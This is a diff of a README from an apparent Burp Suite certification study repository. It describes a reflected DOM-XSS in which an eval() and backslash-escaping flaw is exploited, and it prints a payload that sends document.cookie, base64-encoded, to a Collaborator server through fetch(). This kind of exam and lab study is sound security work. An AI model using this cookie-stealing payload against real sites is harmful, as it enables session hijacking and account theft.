botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 >In the **Search** function a Reflected XSS vulnerability is ***identified*** using ```\"-alert(1)}//``` payload.
 The attacker then deliver an exploit phishing link to the victim with a cookie stealing payload inside a hosted **iframe** on their exploit server.

->***Identify*** The search JavaScript code on the target, return a JSON response.
-Validate that the backslash **\\** escape is not sanitized, and the JSON data is then send to **eval()**.
-Backslash is not escaped correct and when the JSON response attempts to escape the opening double-quotes character, it adds a **second** backslash.
+>***Identify*** that the search JavaScript `source code` on the target, return a JSON response.
+Validate that the backslash **\\** escape is not sanitized, and the JSON data is then send to `eval()`.
+Backslash is not escaped correctly and when the JSON response attempts to escape the opening double-quotes character, it adds a **second** backslash.
 The resulting double-backslash causes the escaping to be effectively cancelled out.

 ```JavaScript
 \"-fetch('https://Collaborator.com?cs='+btoa(document.cookie))}//
 ```

->Image show the request using search function to send the document.cookie value in base64 to collaboration server.
+>Image show the request using search function to send the document.cookie value in base64 using `btoa()` function to collaboration server.

 ![Reflected DOM-XSS JSON cookie stealer](images/reflected-dom-xss-json-cookie-stealer.png)